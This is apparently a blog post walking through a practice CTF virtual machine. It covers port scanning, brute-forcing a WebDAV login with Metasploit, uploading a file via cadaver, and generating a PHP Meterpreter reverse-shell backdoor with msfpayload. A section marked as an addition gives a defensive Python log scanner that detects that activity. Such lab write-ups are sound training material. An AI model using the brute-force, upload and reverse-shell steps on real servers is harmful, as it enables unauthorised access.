From time to time we all go through periods of lulls. In most cases, it may be work or personal related, but I always feel that it is a good idea to keep working on your skills, even if your current job is not what you want it to be, career-wise. For example, the other day I was checking LinkedIn and came across a post about a new “CTF” VMware framework on one of the Pentesting groups I belong to. It was touted as a victim machine that had a simple and a more “advanced” version; however, I think the VM I downloaded was fairly straightforward. More or less, I used it as an excuse to play around and “sharpen my knife”.
After downloading the VM, I was presented with a fairly simple webpage that displayed “images”; basically it was some sort of photo album. The album allowed you to search images, register a new user, and log in/log out. After scanning the system with Nmap, I found no additional ports besides SSH and HTTP. So I then proceeded to perform basic web attacks (e.g. XSS, SQLi, Command Injection, etc.). After trying some of those basic attacks, I started to think: what if this wasn’t the actual “vulnerable” site, but just a decoy? I pulled up my trusty go-to tool, dirbuster. If you have not used dirbuster, it basically allows you to “brute-force” file and folder locations.
After letting dirbuster do its thing, I was intrigued by the directory “/webdav/” and was presented with a login prompt. I tried a few simple user/password combinations (e.g. admin/admin, admin/password, etc.).
After a few failed attempts, I decided to use the metasploit “auxiliary/scanner/http/http_login” module to see if I could find a correct pair. I have a few word-lists that I use, but in this case you can use the default MSF lists.
BAM!!! We find a successful user/password.
After logging-in we are presented with a blank page.
So I decided to use cadaver to log in and see what we could do with the server.
Once I was in, I wanted to see if I had full permissions to upload a file. I did a “mkcol test”, which made a collection named test. Now we can make a backdoor and see if we can get a shell on the box. Using MSF, I made a php backdoor.
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.13 LPORT=80 R > backdoor.php
Then back in the cadaver window, I issued the “put /root/ods/backdoor.php” command to upload it to the server. Now we can set up metasploit to catch our payload using “multi handler”, browse to the file, and we have a session. Simple as that.
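From the defender's side, the WebDAV activity described above (a burst of failed logins against /webdav/, a MKCOL, then a PUT of a .php file) leaves a clear trail in the web server's access log. As an added example that is not part of the original post, this Python snippet scans constructed Apache combined-format log lines for exactly those signals; the /webdav/ prefix, the failure threshold and the script extensions are assumptions.

```python
import re
from collections import Counter

# Constructed Apache combined-format lines for this demo (not from the original post).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "PROPFIND /webdav/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "PROPFIND /webdav/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "PROPFIND /webdav/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "PROPFIND /webdav/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "PROPFIND /webdav/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:20 +0000] "MKCOL /webdav/test/ HTTP/1.1" 201 0 "-" "cadaver/0.23.3"
10.0.0.5 - - [01/Jan/2024:10:00:25 +0000] "PUT /webdav/test/backdoor.php HTTP/1.1" 201 0 "-" "cadaver/0.23.3"
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?search=cats HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# client ip, method, path and status from a combined-format line
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')
WRITE_METHODS = {"PUT", "MKCOL", "MOVE", "COPY", "PROPPATCH"}   # DAV methods that change the tree
SCRIPT_EXT = (".php", ".phtml", ".php5", ".asp", ".aspx", ".jsp", ".cgi", ".pl")  # assumed list

def parse(line):
    """Return (ip, method, path, status) or None for an unparseable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, path, status = m.groups()
    return ip, method.upper(), path, int(status)

def analyze(log_text, dav_prefix="/webdav/", auth_fail_threshold=5):
    """Flag credential-guessing bursts and successful writes into the DAV tree."""
    failures = Counter()          # 401s per client under the DAV prefix
    writes, script_uploads = [], []
    for ip, method, path, status in filter(None, map(parse, log_text.splitlines())):
        if not path.startswith(dav_prefix):
            continue
        if status == 401:
            failures[ip] += 1
        elif method in WRITE_METHODS and 200 <= status < 300:
            writes.append((ip, method, path))
            if method == "PUT" and path.lower().endswith(SCRIPT_EXT):
                script_uploads.append((ip, method, path))   # server-side script landed on disk
    return {
        "brute_force": {ip: n for ip, n in failures.items() if n >= auth_fail_threshold},
        "writes": writes,
        "script_uploads": script_uploads,
    }

if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

Raising `auth_fail_threshold` or tightening `SCRIPT_EXT` to what the server actually executes are the knobs to tune against your own traffic.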
Nothing super groundbreaking, but going through the process of learning new environments will only help you “sharpen your knife”. You can learn more about the people that made this VM here, and can download the VM here.